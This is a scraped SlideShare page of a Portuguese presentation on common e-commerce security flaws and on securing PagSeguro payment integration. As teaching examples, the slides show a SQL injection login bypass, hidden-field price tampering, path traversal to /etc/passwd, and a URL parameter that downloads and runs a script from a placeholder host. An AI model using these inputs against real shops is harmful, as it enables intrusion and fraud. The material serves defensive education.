e­Commerce seguro com 
     PagSeguro
medo
OWASP
owasp.org
Segurança em todo o processo
Sistema atualizado
Portas fechadas  
Senhas seguras
SSL
Falhas na aplicação
SQL Injection
<?
q = db.exec("SELECT * FROM user WHERE
login='%s' AND senha='%s'" % (login,senha))
?>
<?
q = db.exec("SELECT * FROM user WHERE
login='%s' AND senha='%s'" % (login,senha))
?>

login: admin
senha: ' OR '1'='1
<?
q = db.exec("SELECT * FROM user WHERE
login='%s' AND senha='%s'" % (login,senha))
?>

login: admin
senha: ' OR '1'='1

...
Falsificação de Identidade
Controles no Client
<input type="hidden" name="desconto"
value="10,00" />
Quebra de Fluxo
http://seusite.com/compra.php?passo=1
Ataques contra outros clients
HTML Injection
Script Injection
XSS
XSRF
Exposição de recursos
http://seusite.com/compra.php?passo=1
&stop=1&template=azul.php
http://seusite.com/compra.php?passo=1
&stop=1&template=azul.php


http://seusite.com/compra.php?passo=1
&stop=1&template=....
Execução de recursos
http://seusite.com/relatorio.php?
tipo=3&gerador=pdfmaker
http://seusite.com/relatorio.php?
tipo=3&gerador=pdfmaker

http://seusite.com/relatorio.php?
tipo=3&gerador=wget+pirata.co...
Autenticação falha
Criptografia insegura
Falha de restrição de acesso
Denial Of Service
Pagamento: processo crítico
PagSeguro
PagSeguro:
 ­ Uma única implantação
    ­ Segurança contra 
    chargeback/fraude
­ EVSSL + Aplicação segura
Formas de implantação:
 ­ Carrinho PagSeguro
    ­ Carrinho Próprio
 ­ Retorno Automático
Pontos sensíveis:
­ HTML do Form de Carrinho
     ­ URL de Retorno
Proteja sua URL de Retorno:
   ­ Valide com o Token
     ­ Valide os Valores
             ­ Log
        ­ Fique alerta!
Obrigado!

    visie.com.br
elcio@visie.com.br
E-commerce seguro com PagSeguro
Próximos SlideShares
Carregando em…5
×

E-commerce seguro com PagSeguro

1.622 visualizações

Publicada em

Conheça as falhas de segurança mais comuns em comércio eletrônico, entenda como proteger seu e-commerce de invasores e fraudadores e saiba como PagSeguro pode ajudar a tornar sua loja virtual segura.

Publicada em: Tecnologia
0 comentários
4 gostaram
Estatísticas
Notas
  • Seja o primeiro a comentar

Sem downloads
Visualizações
Visualizações totais
1.622
No SlideShare
0
A partir de incorporações
0
Número de incorporações
12
Ações
Compartilhamentos
0
Downloads
65
Comentários
0
Gostaram
4
Incorporações 0
Nenhuma incorporação

Nenhuma nota no slide

E-commerce seguro com PagSeguro

  1. 1. e­Commerce seguro com  PagSeguro
  2. 2. medo
  3. 3. OWASP owasp.org
  4. 4. Segurança em todo o processo
  5. 5. Sistema atualizado
  6. 6. Portas fechadas  
  7. 7. Senhas seguras
  8. 8. SSL
  9. 9. Falhas na aplicação
  10. 10. SQL Injection
  11. 11. <? q = db.exec("SELECT * FROM user WHERE login='%s' AND senha='%s'" % (login,senha)) ?>
  12. 12. <? q = db.exec("SELECT * FROM user WHERE login='%s' AND senha='%s'" % (login,senha)) ?> login: admin senha: ' OR '1'='1
  13. 13. <? q = db.exec("SELECT * FROM user WHERE login='%s' AND senha='%s'" % (login,senha)) ?> login: admin senha: ' OR '1'='1 SELECT * FROM user WHERE login='admin' AND senha='' OR '1'='1'
  14. 14. Falsificação de Identidade
  15. 15. Controles no Client
  16. 16. <input type="hidden" name="desconto" value="10,00" />
  17. 17. Quebra de Fluxo
  18. 18. http://seusite.com/compra.php?passo=1
  19. 19. Ataques contra outros clients
  20. 20. HTML Injection
  21. 21. Script Injection
  22. 22. XSS
  23. 23. XSRF
  24. 24. Exposição de recursos
  25. 25. http://seusite.com/compra.php?passo=1 &stop=1&template=azul.php
  26. 26. http://seusite.com/compra.php?passo=1 &stop=1&template=azul.php http://seusite.com/compra.php?passo=1 &stop=1&template=../../etc/passwd
  27. 27. Execução de recursos
  28. 28. http://seusite.com/relatorio.php? tipo=3&gerador=pdfmaker
  29. 29. http://seusite.com/relatorio.php? tipo=3&gerador=pdfmaker http://seusite.com/relatorio.php? tipo=3&gerador=wget+pirata.com/script http://seusite.com/relatorio.php? tipo=3&gerador=sh+script
  30. 30. Autenticação falha
  31. 31. Criptografia insegura
  32. 32. Falha de restrição de acesso
  33. 33. Denial Of Service
  34. 34. Pagamento: processo crítico
  35. 35. PagSeguro
  36. 36. PagSeguro: ­ Uma única implantação ­ Segurança contra  chargeback/fraude ­ EVSSL + Aplicação segura
  37. 37. Formas de implantação: ­ Carrinho PagSeguro ­ Carrinho Próprio ­ Retorno Automático
  38. 38. Pontos sensíveis: ­ HTML do Form de Carrinho ­ URL de Retorno
  39. 39. Proteja sua URL de Retorno: ­ Valide com o Token ­ Valide os Valores ­ Log ­ Fique alerta!
  40. 40. Obrigado! visie.com.br elcio@visie.com.br

×